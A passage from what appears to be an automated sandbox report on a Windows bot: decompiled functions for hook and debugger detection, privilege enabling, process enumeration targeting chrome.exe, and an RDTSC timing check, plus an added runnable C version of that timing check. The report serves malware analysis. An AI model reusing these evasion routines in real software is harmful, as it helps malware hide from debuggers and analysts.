						goto L1;
					}
					__eflags = _t86 - 0xeb;
					if(_t86 == 0xeb) { // 0xeb = jmp rel8
						goto L1;
					}
					__eflags = _t86 - 0xe8;
					if(_t86 == 0xe8) { // 0xe8 = call rel32
						goto L1;
					}
                        					_t88 =  *E0288489C;
                        					__eflags = _t88 - 0xe9;
                        					if(_t88 == 0xe9) {
                        						goto L1;
                        					}
                        					__eflags = _t88 - 0xeb;
                        					if(_t88 == 0xeb) {
                        						goto L1;
                        					}
                        					__eflags = _t88 - 0xe8;
                        					if(_t88 == 0xe8) {
                        						goto L1;
                        					} else {
                        						_t177 = 2; // executed
                        						E0286DDFF(_t177, E0288489C, _t197); // executed
                        						__eflags = _v12;
                        						if(_v12 == 0) {
                        							__eflags = 1;
                        							E0286DDFF(1, E0288489C, _t197); // executed
                        						}
                        						E0286E58A(_t187);
                        						_t93 = E0286D774( *( *0x289f2e8 + 4) & 0x0000ffff);
                        						__eflags = _t93 - 1;
                        						if(_t93 != 1) {
                        							L21:
                        							_t96 = E0286D4DC(_t187,  *( *0x289f2e8 + 4) & 0x0000ffff); // executed
                        							__eflags = _t96;
                        							if(_t96 == 0) {
                        								goto L1;
                        							}
                        							_t188 =  *0x289f2e8;
                        							_t98 = E0286D774( *(_t188 + 4) & 0x0000ffff);
                        							__eflags = _t98;
                        							if(_t98 != 0) {
                        								L31:
                        								_t189 =  *(_t188 + 0xa);
                        								__eflags = _t189 & 0x00000003;
                        								if((_t189 & 0x00000003) == 0) {
                        									E028614DB(_t189,  &_v544, 0, 0x208);
                        									_t158 = E028643D4( *0x289f2e8 + 0x11b6);
                        									__eflags = _t158;
                        									if(_t158 == 0) {
                        										_t159 =  *0x289f914("comctl32.dll");
                        										__eflags = _t159;
                        										if(_t159 != 0) {
                        											_t189 =  *0x289f2e8 + 0x11b6;
                        											__eflags = _t189;
                        											 *0x289f8c8(_t159, _t189, 0x103);
                        										}
                        									}
                        								}
                        								__eflags =  *0x289f2f4 & 0x00000020;
                        								if(( *0x289f2f4 & 0x00000020) == 0) {
                        									Sleep(0x3c); // executed
                        								}
                        								_t179 = 4;
                        								E0286DDFF(_t179, _t189, _t197);
                        								__eflags = _v12 - 1;
                        								if(_v12 == 1) {
                        									__eflags = 1;
                        									E0286DDFF(1, _t189, _t197);
                        								}
                        								_t190 =  *0x289f2e8;
                        								__eflags =  *(_t190 + 0xa) & 0x00000020;
                        								if(( *(_t190 + 0xa) & 0x00000020) != 0) {
                        									_t150 = E0286D774( *(_t190 + 4) & 0x0000ffff);
                        									__eflags = _t150;
                        									if(_t150 != 0) {
                        										E02863D40("SeRestorePrivilege", 1); // executed
                        										E02863D40("SeBackupPrivilege", 1); // executed
                        										_t190 =  *0x289f2e8;
                        									}
                        								}
                        								__eflags =  *(_t190 + 0xa) & 0x00000002;
                        								if(( *(_t190 + 0xa) & 0x00000002) != 0) {
                        									L54:
                        									_t180 = 0;
                        									__eflags = 0;
                        									goto L55;
                        								} else {
                        									_t129 = E0286D774( *(_t190 + 4) & 0x0000ffff);
                        									__eflags = _t129 - 1;
                        									if(_t129 != 1) {
                        										goto L54;
                        									}
                        									_t180 = 0;
                        									_v16 = 0;
                        									_v24 = 0;
									_t132 = NtQueryInformationProcess(0xffffffff, 7,  &_v16, 4,  &_v24); // executed; class 7 = ProcessDebugPort
                        									__eflags = _t132;
                        									if(_t132 >= 0) {
                        										__eflags = _v16;
                        										if(_v16 != 0) {
                        											L028876E3(0x400, _t190, 0xffffffff,  *0x289f57c, 1,  &_v20);
                        										}
                        									}
                        									E02863207( *0x289fdb4);
                        									E0286FF36(_t180, _t190);
                        									E0286D78A(_t190);
                        									_t137 =  *0x289fa6c(_t180) & 0x0000ffff;
                        									__eflags = _t137 - _t180;
                        									if(_t137 == _t180) {
                        										L49:
                        										_t138 = E0287039F(_t190);
                        										__eflags = _t138 - 1;
                        										if(_t138 == 1) {
                        											goto L1;
                        										}
                        										__eflags = E0286D774( *( *0x289f2e8 + 4) & 0x0000ffff);
                        										if(__eflags != 0) {
                        											_t144 =  *0x289f564;
                        											__eflags = _t144 - _t180;
                        											if(__eflags != 0) {
                        												_t145 =  *_t144();
                        												_t190 =  *0x289f2e8;
                        												 *((intOrPtr*)( *0x289f2e8 + 0x266e)) = _t145;
                        											}
                        										}
                        										 *((intOrPtr*)( *0x289f2e8 + 0x16)) = E02863145(_t190, 0, __eflags,  *0x2898a40, "LSF");
                        										E02866ED1(__eflags); // executed
                        										_t190 =  *0x289f2e8;
                        										L55:
                        										__eflags =  *(_t190 + 0x12) & 0x00000002;
                        										if(( *(_t190 + 0x12) & 0x00000002) != 0) {
                        											_v9 = 1;
                        										}
                        										E0286DFDA(_t203, _v11 & 0x000000ff);
                        										_t198 =  *0x289f2e8;
                        										_t103 = E02880FB5( *((intOrPtr*)(_t198 + 0x1e)));
                        										__eflags = _t103 - _t180;
                        										if(_t103 == _t180) {
                        											L60:
                        											_t51 = _t198 + 0xa;
                        											 *_t51 =  *(_t198 + 0xa) | 0x00000240;
                        											__eflags =  *_t51;
                        											_v10 = _t180;
                        											goto L61;
                        										} else {
                        											_t127 = _t103 + 0xa0;
                        											__eflags = _t127 - _t180;
                        											if(_t127 == _t180) {
                        												goto L60;
                        											}
                        											__eflags =  *((intOrPtr*)(_t127 + 4)) - 0x20;
                        											if( *((intOrPtr*)(_t127 + 4)) >= 0x20) {
                        												L61:
                        												_t191 =  *(_t198 + 0xe);
                        												__eflags = _t191 - _t180;
                        												if(_t191 != _t180) {
                        													_t122 =  *(_t198 + 0xa);
                        													__eflags = _t122 & 0x00000001;
                        													if((_t122 & 0x00000001) != 0) {
                        														_t191 = _t191 - 1;
                        														__eflags = _t191;
                        														if(_t191 == 0) {
                        															__eflags = _t198 + 0x1646;
                        															E0288383B(_t198 + 0x1646, _t122 >> 0x00000005 & 1);
                        															_t198 =  *0x289f2e8;
                        														}
                        														 *(_t198 + 0xe) = _t180;
                        													}
                        												}
                        												__eflags = _v9 - _t180;
                        												if(_v9 == _t180) {
                        													__eflags =  *(_t198 + 0xa) & 0x00000001;
                        													if(__eflags == 0) {
                        														E0286E03F(_t198, __eflags);
                        														_t198 =  *0x289f2e8;
                        													}
                        												}
                        												__eflags =  *((intOrPtr*)(_t198 + 0x11e)) - _t180;
                        												if( *((intOrPtr*)(_t198 + 0x11e)) == _t180) {
                        													L71:
                        													E0286FD4D(_t191);
                        													_t198 =  *0x289f2e8;
                        													goto L72;
                        												} else {
                        													__eflags =  *((intOrPtr*)(_t198 + 0x122)) - _t180;
                        													if( *((intOrPtr*)(_t198 + 0x122)) != _t180) {
                        														L72:
                        														__eflags = _v10 - 1;
                        														if(_v10 == 1) {
                        															_t119 = E0286D774( *(_t198 + 4) & 0x0000ffff);
                        															__eflags = _t119 - 1;
                        															if(_t119 == 1) {
                        																__eflags =  *(_t198 + 0xa) & 0x00000003;
                        																if(( *(_t198 + 0xa) & 0x00000003) == 0) {
                        																	E02877D31(_t191, _t198);
                        																	_t198 =  *0x289f2e8;
                        																}
                        															}
                        														}
                        														__eflags = _v9 - 1;
                        														if(__eflags == 0) {
                        															E0286E03F(_t198, __eflags);
                        															_t198 =  *0x289f2e8;
                        														}
                        														 *((intOrPtr*)(_t198 + 0x2666)) =  *((intOrPtr*)(_t198 + 0x15a));
                        														_t106 = E0286DDFF(0, _t191, _t198); // executed
                        														__eflags = _t106;
                        														if(_t106 == 0) {
                        															goto L1;
                        														} else {
                        															_t192 =  *0x289f2e8;
                        															_t108 = E0286D774( *(_t192 + 4) & 0x0000ffff);
                        															__eflags = _t108 - 1;
                        															if(_t108 != 1) {
                        																__eflags =  *(_t192 + 0xa) & 0x00000080;
                        																if(( *(_t192 + 0xa) & 0x00000080) != 0) {
                        																	E028884DE();
                        																}
                        															} else {
                        																E028884A2();
                        															}
                        															__eflags =  *0x289eea8 - E0288489C;
                        															if(__eflags == 0) {
                        																__eflags = E0286E5D6(_a4) - 1;
                        																if(__eflags == 0) {
                        																	E028614DB(_t192, _a4, 0, 0x2672);
                        																}
                        															}
                        															E0286CE65(_t192, __eflags);
                        															__eflags =  *0x289ec6e;
                        															if( *0x289ec6e == 0) {
                        																 *( *0x289f2e8 + 4) = 0x80;
                        															}
                        															return 1;
                        														}
                        													}
                        													goto L71;
                        												}
                        											}
                        											goto L60;
                        										}
                        									} else {
                        										__eflags = _t137 - 0x40;
                        										if(_t137 == 0x40) {
                        											goto L1;
                        										}
                        										goto L49;
                        									}
                        								}
                        							}
                        							__eflags =  *(_t188 + 0xa) & 0x00000002;
                        							if(( *(_t188 + 0xa) & 0x00000002) == 0) {
                        								goto L31;
                        							}
                        							_t161 =  *(_t188 + 0x162);
                        							__eflags = _t161;
                        							if(_t161 == 0) {
                        								goto L31;
                        							}
                        							_t162 =  *0x289f6f0(0x400, 0, _t161);
                        							__eflags = _t162;
                        							if(_t162 != 0) {
                        								 *0x289f824(_t162);
                        								L30:
                        								_t188 =  *0x289f2e8;
                        								goto L31;
                        							}
                        							_t164 =  *0x289f884();
                        							__eflags = _t164 - 5;
                        							if(_t164 == 5) {
                        								goto L30;
                        							}
                        							L27:
                        							 *0x289f90c(0x3e8);
                        							goto L27;
                        						}
                        						_t166 = E028851EF(_t187); // executed
                        						__eflags = _t166;
                        						if(_t166 == 0) {
                        							goto L1;
                        						}
                        						E0286DFA0();
                        						_t168 = E0286715C();
                        						__eflags = _t168 - 1;
                        						if(_t168 == 1) {
                        							L28:
                        							 *0x289f608(0xffffffff, 0);
                        							goto L1;
                        						}
                        						_t170 = E028671EB();
                        						__eflags = _t170 - 1;
                        						if(_t170 == 1) {
                        							goto L28;
                        						}
                        						_t171 = E02867DE0();
                        						__eflags = _t171;
                        						if(_t171 != 0) {
                        							L16:
                        							_t172 =  *0x289f908();
                        							_t187 = 0;
                        							__eflags = _t172;
                        							if(_t172 != 0) {
                        								_t10 = _t172 % 0x3e8;
                        								__eflags = _t10;
                        								_t197 = _t10;
                        								_t187 = _t172 / 0x3e8;
                        							}
                        							_t203 = _t187;
                        							__eflags = _t187;
                        							if(_t187 == 0) {
                        								goto L21;
                        							}
                        							L19:
                        							__eflags = _t203 - 0xb4;
                        							if(_t203 < 0xb4) {
                        								 *0x289f2f4 =  *0x289f2f4 | 0x00000020;
                        								__eflags =  *0x289f2f4;
                        								_v11 = 1;
                        								 *0x289f90c(0x7d0);
                        							}
                        							goto L21;
                        						}
                        						_t175 = E028646D8(_t187); // executed
                        						_t203 = _t175;
                        						__eflags = _t203;
                        						if(_t203 != 0) {
                        							goto L19;
                        						}
                        						goto L16;
                        					}
                        				}
                        				L1:
                        				return 0;
                        			}

                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: LSF$SeBackupPrivilege$SeRestorePrivilege$comctl32.dll
                        • API String ID: 0-2627624081
                        • Opcode ID: c611535458f8cfc957fd61230ea4c1442d493154c4290b3d9abb5f77c0bdb677
                        • Instruction ID: a701fc088f01726a83498a558b0e45e93fe6cd4b226801f9b2af95167d2eaf91
                        • Opcode Fuzzy Hash: c611535458f8cfc957fd61230ea4c1442d493154c4290b3d9abb5f77c0bdb677
                        • Instruction Fuzzy Hash: D2C1583CA402449BDB28ABB8D44CFB97767AF15308F1C8555EA88DB6C2CB71C492CF56
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        C-Code - Quality: 55%
                        			E028802BF(void* __ecx, void* __edx) {
                        				char _v536;
                        				intOrPtr _v548;
                        				char _v564;
                        				char _v568;
                        				char _v572;
                        				void* _v584;
                        				intOrPtr _v586;
                        				intOrPtr _v590;
                        				signed int _v592;
                        				char _v596;
                        				signed int _v600;
                        				int _v604;
                        				int _v608;
                        				intOrPtr _v612;
                        				intOrPtr _v616;
                        				intOrPtr _v620;
                        				void* __esi;
                        				intOrPtr _t60;
                        				intOrPtr _t61;
                        				void* _t62;
                        				int _t65;
                        				intOrPtr _t66;
                        				int _t70;
                        				intOrPtr _t73;
                        				void* _t78;
                        				short _t79;
                        				void* _t82;
                        				void* _t92;
                        				void* _t99;
                        				int _t101;
                        				intOrPtr _t103;
                        				void* _t106;
                        				intOrPtr _t107;
                        
                        				_t99 = __edx;
                        				_t98 = __ecx;
                        				_t101 = 0;
                        				_v604 = 0;
                        				_v608 = 0;
                        				_v600 = 0;
                        				E028614DB(__ecx,  &_v564, 0, 0x22c);
                        				_t60 =  *0x289f2e8;
                        				if(( *(_t60 + 0xa) & 0x00000040) != 0 || ( *(_t60 + 0x16) & 0x00000100) != 0) {
                        					L7:
                        					_t61 = 0;
                        					goto L8;
                        				} else {
                        					_t62 = CreateToolhelp32Snapshot(2, 0); // executed
                        					_t106 = _t62;
                        					_v592 = _t106;
                        					if(_t106 == 0xffffffff) {
                        						goto L7;
                        					} else {
                        						if(( *( *0x289f2e8 + 0xa) & 0x00000020) != 0) {
                        							E02863D40("SeDebugPrivilege", 1); // executed
                        						}
                        						_push( &_v568);
                        						_v568 = 0x22c;
                        						_t65 = Process32FirstW(_t106); // executed
                        						if(_t65 != 0) {
                        							do {
                        								_t66 = _v564;
                        								if(_t66 == _t101) {
                        									goto L31;
                        								}
                        								_v600 = _v600 & 0x00000000;
                        								_v592 = _v592 & 0x00000000;
                        								_v616 = _v616 + 1;
                        								_t103 = _v548;
                        								_t107 = _t66;
                        								_v604 = _t107;
                        								if(_t66 ==  *0x289fdb4) {
                        									goto L31;
                        								}
                        								if(_v616 < 0xc) {
                        									_t92 =  *0x289f69c( &_v536, L"services.exe");
                        									if(_t92 == 0 && _v620 == _t92) {
                        										_v620 = _t107;
                        									}
                        								}
                        								if(_t103 != _v612 && (E0287FD1B( &_v536) != 1 || _v616 >= 0x14)) {
                        									_t73 =  *0x289f2e8;
                        									if(_t103 !=  *((intOrPtr*)(_t73 + 0x162))) {
                        										L21:
                        										if(( *(_t73 + 0x16) & 0x00001000) == 0 || E0286406C( &_v536) != 1) {
                        											_push(L"chrome.exe");
                        											_push( &_v536);
                        											if( *0x289f69c() == 0) {
                        												E028739F1(_t103,  &_v600);
                        											}
                        											_t78 = E0288AD40(_v612, _t98, _t99,  &_v608);
                        											if(_v612 == 1) {
                        												_t78 = 1;
                        											}
                        											if(_t78 == 0) {
                        												_t79 = 0xe;
                        												_v596 = _t79;
                        												_v590 = 0;
                        												_v586 = _t103;
                        												_t82 = E02881AAA(_t99, _v612,  &_v596, 0,  *0x28a0658, 1, 0); // executed
                        												if(_t82 == 0) {
                        													_v616 = _v616 + 1;
                        												}
                        											}
                        										} else {
                        											E02865257(_v564);
                        										}
                        										goto L31;
                        									}
                        									_push(_t73 + 0x2376);
                        									_push( &_v536);
                        									if( *0x289f69c() == 0) {
                        										goto L31;
                        									}
                        									_t73 =  *0x289f2e8;
                        									goto L21;
                        								}
                        								L31:
                        								_t101 = 0;
                        								E028614DB(_t98,  &_v572, 0, 0x22c);
                        								_v584 = 0x22c;
                        								_t70 = Process32NextW(_v608,  &_v584); // executed
                        							} while (_t70 == 1);
                        							 *0x289f824(_v600);
                        							_t61 = _v616;
                        							L8:
                        							return _t61;
                        						} else {
                        							 *0x289f824(_t106);
                        							goto L7;
                        						}
                        					}
                        				}
                        			}

                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000,0000022C,00000000,?,00000001), ref: 02880304
                        • Process32FirstW.KERNEL32(00000000,?), ref: 02880336
                        • Process32NextW.KERNEL32(?,?,?,00000000,0000022C), ref: 0288049B
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process32$CreateFirstNextSnapshotToolhelp32
                        • String ID: SeDebugPrivilege$chrome.exe$services.exe
                        • API String ID: 1238713047-3113674346
                        • Opcode ID: 94e9c23b8938577c59c2e9d7d60f25de4561bf59414f0ff46f1d4d77f596962f
                        • Instruction ID: 31ee9ee068923fb8cf91f3e213e5233b5e7f57dce6e099c2ca863e20ea2bea02
                        • Opcode Fuzzy Hash: 94e9c23b8938577c59c2e9d7d60f25de4561bf59414f0ff46f1d4d77f596962f
                        • Instruction Fuzzy Hash: 82518A7D948300AFD720EF25D848B6BB7E9FF84319F084919F988D2291D334D5188F92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        C-Code - Quality: 52%
                        			E02884963(intOrPtr __eax, void* __ecx, void* __edx, void* __edi, void* __eflags) {
                        				intOrPtr _v5;
                        				signed char _v9;
                        				char _v12;
                        				void* __ebp;
                        				intOrPtr _t29;
                        				void* _t33;
                        				intOrPtr _t34;
                        				void* _t38;
                        				void* _t47;
                        				void* _t51;
                        				void* _t53;
                        				signed int _t62;
                        				void* _t64;
                        				intOrPtr _t67;
                        				void* _t74;
                        				void* _t88;
                        				void* _t96;
                        				intOrPtr _t98;
                        				void* _t99;
                        				intOrPtr _t104;
                        				/* temporaries used below that the decompiler left undeclared */
                        				void* _t93;
                        				void* _t105;
                        				void* _t119;
                        				void* _t123;
                        				void* _t129;
                        				void* _t130;
                        				signed int _t132;
                        
                        				_t99 = __edx;
                        				_t96 = __ecx;
                        				_t104 = __eax;
                        				if(E0286E5D6(__eax) == 0) {
                        					_t104 = 0;
                        				}
                        				E02884C84(_t96);
                        				_push("mscoree.dll");
                        				 *0x28a0050 = 0;
                        				 *0x28a0048 = 0;
                        				 *0x28a004c = 0;
                        				if( *0x289f8cc() == 0) { // unresolved import, called with "mscoree.dll"; the handler is installed only when it returns 0
                        					 *0x28a0044 = 0; // executed
                        					 *0x289f724(0, E028758A7); // executed -- RtlAddVectoredExceptionHandler(First=0, Handler=E028758A7) per the API list below
                        				}
                        				_t29 = 2;
                        				 *0x28a0044 = _t29; // init-stage marker: 0 above, 2 here, 3 or 4 further down
                        				if(E02865774(_t104) != 0) {
                        					L9:
                        					_t33 = E0286E06B(0x28a0044, _t99, _t119, _t104); // executed
                        					if(_t33 == 0) {
                        						 *0x289f6fc(0);
                        					}
                        					if(( *0x289fdc8 & 0x00000080) == 0 || E0286D774( *( *0x289f2e8 + 4) & 0x0000ffff) != 0) {
                        						_push(3);
                        					} else {
                        						_push(4);
                        					}
                        					_pop(_t34);
                        					 *0x28a0044 = _t34;
                        					_t38 = E0286D774( *( *0x289f2e8 + 4) & 0x0000ffff);
                        					_t123 = _t38 - 1;
                        					if(_t38 == 1) {
                        						E02865B4A(0x28a0044, _t123); // executed
                        					}
                        					_pop(_t105);
                        					_pop(_t93);
                        					_push(0x28a0044);
                        					_push(0x28a0044);
                        					_v9 =  *( *0x289f2e8 + 0xa) >> 0x00000001 & 0x00000001;
                        					E0286FC3E(0x28a0044, _t123);
                        					_t98 =  *0x289f2e8;
                        					if(E0286D774( *(_t98 + 4) & 0x0000ffff) == 1) {
                        						E0288383B(_t98,  *(_t98 + 0xa) >> 0x00000005 & 1); // executed
                        					}
                        					if( *0x28a0654 != 0) {
                        						_t74 = E02865E00(E0287E210, 0, 0, 0x1b, 0,  &_v12, 0x50);
                        						if(_t74 != 0) {
                        							 *0x289f824(_t74);
                        						}
                        					}
                        					_t47 = E02865E00(E028800ED, 0, 0, 0x18, 0,  &_v12, 0x18); // executed
                        					if(_t47 != 0) {
                        						 *0x289f824(_t47);
                        					}
                        					E0287FD11();
                        					Sleep(0x64); // executed -- 100 ms
                        					_t51 = E0286D774( *( *0x289f2e8 + 4) & 0x0000ffff);
                        					_t129 = _t51 - 1;
                        					if(_t51 == 1) {
                        						E0287F56D(_t98, _t129); // executed
                        					}
                        					_t53 = E02865E00(E02889FE6, 0, 0, 4, 0,  &_v12, 0x18); // executed
                        					_t130 = _t53;
                        					if(_t53 != 0) {
                        						 *0x289f824(_t53);
                        					}
                        					Sleep(0x64); // executed -- 100 ms
                        					E02884BCA(_t98, _t130);
                        					E02884CBC();
                        					if(E0286D774( *( *0x289f2e8 + 4) & 0x0000ffff) != 1) {
                        						__eflags = _v5 - 1;
                        						if(_v5 != 1) {
                        							goto L41;
                        						} else {
                        							goto L34;
                        						}
                        						while(1) {
                        							L34:
                        							_t62 =  *0x289f8a4( *0x289fdb0, 0x3c);
                        							__eflags = _t62;
                        							if(__eflags == 0) {
                        								__eflags = E0286319B(__eflags, "ULiFS", 0x43) - 1;
                        							} else {
                        								__eflags = _t62 - 0xffffffff;
                        							}
                        							if(__eflags == 0) {
                        								break;
                        							}
                        							 *0x289f90c(0x3c);
                        						}
                        						_t64 =  *0x289f848();
                        						_t98 =  *0x289f2e8;
                        						__eflags =  *(_t98 + 0xa) & 0x00000002;
                        						if(( *(_t98 + 0xa) & 0x00000002) != 0) {
                        							E02880A42(_t64);
                        						}
                        						goto L41;
                        					} else {
                        						 *0x289f8b0(0x289fff8, 0xfa0);
                        						_t67 =  *0x289f2e8;
                        						_t132 =  *(_t67 + 0x16) & 0x00001000;
                        						if(( *(_t67 + 0x16) & 0x00001000) != 0) {
                        							E02863FCD(); // executed
                        						}
                        						E028707D7(_t132); // executed
                        						L41:
                        						E0286E4FF(_t98);
                        						if(_v5 == 1) {
                        							L02887454(0xfffffffe); // 0xfffffffe is the current-thread pseudo-handle (GetCurrentThread())
                        						}
                        						return 1;
                        					}
                        				} else {
                        					if(_t104 == 0) {
                        						L8:
                        						 *0x289f6fc(0);
                        						goto L9;
                        					}
                        					_t88 = E0286D774( *(_t104 + 4) & 0x0000ffff);
                        					_t119 = _t88 - 1;
                        					if(_t88 == 1) {
                        						goto L8;
                        					}
                        					 *0x289f5dc(0xfffffffe, 0); // unresolved import on the current-thread pseudo-handle
                        					goto L9;
                        				}
                        			}

                        APIs
                        • RtlAddVectoredExceptionHandler.NTDLL(00000000,028758A7,?,?,?,02884925,?,?,?,0288488D,00000000), ref: 028849A7
                        • Sleep.KERNEL32(00000064,028800ED,00000000,00000000,00000018,00000000,?,00000018,?,?,?,?,?,?,?), ref: 02884AD8
                        • Sleep.KERNEL32(00000064,02889FE6,00000000,00000000,00000004,00000000,?,00000018,?,?,?,?,?,?,?,02884925), ref: 02884B18
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: Sleep$ExceptionHandlerVectored
                        • String ID: ULiFS$mscoree.dll
                        • API String ID: 4094958979-3325193812
                        • Opcode ID: 787944aa0af1963232a6bde734cd4ddcfe20db685dfd45b4d97e057f237225fd
                        • Instruction ID: 8472de0e6cdc567e4bb893ea9753dc45c4fb99276c2e1a3c4c6ef1aca9d45f17
                        • Opcode Fuzzy Hash: 787944aa0af1963232a6bde734cd4ddcfe20db685dfd45b4d97e057f237225fd
                        • Instruction Fuzzy Hash: D8514A7E9C03016AEA30BBE8AC4DFBA379DAF15714B180901F749DB5C1CB358461DBA6
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 33%
                        			E02864592(intOrPtr __eax, void* __ecx) {
                        				struct _SECURITY_ATTRIBUTES* _v8;
                        				struct _SECURITY_ATTRIBUTES* _v12;
                        				char _v76;
                        				void* _t29;
                        				void* _t31;
                        				void* _t47;
                        
                        				_v12 = 0;
                        				_v8 = 0;
                        				asm("rdtsc"); // first read; only EAX (low 32 bits of the TSC) is kept
                        				_v12 = __eax;
                        				asm("rdtsc"); // second read, immediately after the first
                        				_v8 = __eax;
                        				// (t1 - t0) + 0xfffffe6f > 0x257e  is  (t1 - t0) - 0x191 > 0x257e, i.e. a gap above 0x270f (9999) cycles
                        				// between two back-to-back RDTSCs; the bot reads that as a hypervisor trap or instrumentation
                        				if(_v8 - _v12 + 0xfffffe6f > 0x257e) {
                        					E028614DB(__ecx,  &_v76, 0, 0x40); // zero a 0x40-byte buffer
                        					 *0x289f6a8( &_v76, "JJ8J^QPE", _t47); // copy the first obfuscated name into it (import unresolved)
                        					E02862485( *0x289f6b8( &_v76),  &_v76,  &_v76); // decode it in place (length call unresolved; the plaintext is not on this page)
                        					_t29 = CreateFileA( &_v76, 1, 1, 0, 4, 0, 0); // executed -- FILE_READ_DATA, FILE_SHARE_READ, OPEN_ALWAYS
                        					if(_t29 != 0xffffffff) { // INVALID_HANDLE_VALUE; a second obfuscated name is tried below, and 0 is returned only if both fail
                        						L4:
                        						 *0x289f824(_t29);
                        						_t31 = 1;
                        						L6:
                        						return _t31;
                        					}
                        					E028614DB( &_v76,  &_v76, 0, 0x40);
                        					 *0x289f6a8( &_v76, "JJ8J@TynQcseb");
                        					E02862485( *0x289f6b8( &_v76),  &_v76,  &_v76);
                        					_t29 = CreateFileA( &_v76, 1, 1, 0, 4, 0, 0); // executed
                        					if(_t29 == 0xffffffff) {
                        						_t31 = 0;
                        						goto L6;
                        					}
                        					goto L4;
                        				}
                        				return 1;
                        			}

                        APIs
                        • CreateFileA.KERNEL32(?,00000001,00000001,00000000,00000004,00000000,00000000), ref: 02864603
                        • CreateFileA.KERNEL32(?,00000001,00000001,00000000,00000004,00000000,00000000), ref: 02864648
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateFile
                        • String ID: JJ8J@TynQcseb$JJ8J^QPE
                        • API String ID: 823142352-2417344106
                        • Opcode ID: 2579aae61a4ae88dfaa338f4d754c49affae0c1627aa10cad59fa1f6b984e2d2
                        • Instruction ID: 4354f60c7ad90d28222c1bd1806d2f2a6704d1b80da9a434513691de23d10653
                        • Opcode Fuzzy Hash: 2579aae61a4ae88dfaa338f4d754c49affae0c1627aa10cad59fa1f6b984e2d2
                        • Instruction Fuzzy Hash: 0B2178B9D40218BACB20DBB4DC4CEDF7BBDEF85624F084911F606E2584D6349286CB60
                        Uniqueness

                        Uniqueness Score: -1.00%
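As an added example (editor-written; not code from the sample or from Joe Sandbox), the timing half of E02864592 above, rewritten in plain C with the threshold made explicit. The decompiler's `_v8 - _v12 + 0xfffffe6f > 0x257e` is `(t1 - t0) - 0x191 > 0x257e`, i.e. a gap of more than 0x270f (9999) cycles between two back-to-back RDTSC reads, computed on the low 32 bits only. Treating the comparison as signed is an assumption: with an unsigned compare a normal gap of a few dozen cycles would wrap below 0x191 and trip the check on every run, so signed is the only reading under which the test does what the report describes. The live probe reads the counter only on x86; the decision function itself runs anywhere. The CreateFileA fallback on the two obfuscated names is not reproduced, since the page does not decode them.

```c
#include <stdint.h>
#include <stdio.h>

/* Constants lifted from the decompiled compare in E02864592. */
#define RDTSC_BIAS      0x191u    /* "+ 0xfffffe6f" is "- 0x191" in 32-bit arithmetic */
#define RDTSC_THRESHOLD 0x257e    /* compared against as a signed value (assumption, see lead-in) */

/* The sample's decision on two low-32-bit TSC reads: returns 1 when the gap is
 * "too slow" (more than 0x270f == 9999 cycles), which the bot treats as a
 * hypervisor trap, single-stepping or other instrumentation. */
int rdtsc_gap_suspicious(uint32_t t0, uint32_t t1)
{
    uint32_t delta = t1 - t0;                        /* wraps correctly across a 32-bit rollover */
    int32_t adjusted = (int32_t)(delta - RDTSC_BIAS); /* signed reinterpretation of the sample's compare */
    return adjusted > RDTSC_THRESHOLD;
}

/* Low 32 bits of the TSC, as the sample keeps only EAX. Returns 0 where there
 * is no TSC so the decision function can still be exercised on other CPUs. */
static uint32_t tsc_lo(void)
{
#if defined(__x86_64__) || defined(__i386__)
    return (uint32_t)__builtin_ia32_rdtsc();
#else
    return 0;
#endif
}

/* Runs the sample's single-shot check `rounds` times. Returns how many rounds
 * tripped it and writes the smallest gap seen. The sample measures exactly once,
 * so anything that lands between its two reads (interrupt, context switch, SMI)
 * is enough to trip it; a careful version keeps the minimum over several rounds
 * instead of trusting one pair of reads. */
int rdtsc_probe(int rounds, uint32_t *min_gap)
{
    int trips = 0;
    uint32_t best = 0xffffffffu;
    for (int i = 0; i < rounds; i++) {
        uint32_t t0 = tsc_lo();
        uint32_t t1 = tsc_lo();
        if (t1 - t0 < best) best = t1 - t0;
        trips += rdtsc_gap_suspicious(t0, t1);
    }
    if (min_gap) *min_gap = best;
    return trips;
}

int main(void)
{
    uint32_t min_gap = 0;
    int trips = rdtsc_probe(200, &min_gap);
    printf("smallest RDTSC gap: %u cycles; %d/200 rounds exceeded the sample's 9999-cycle limit\n",
           min_gap, trips);
    return 0;
}
```

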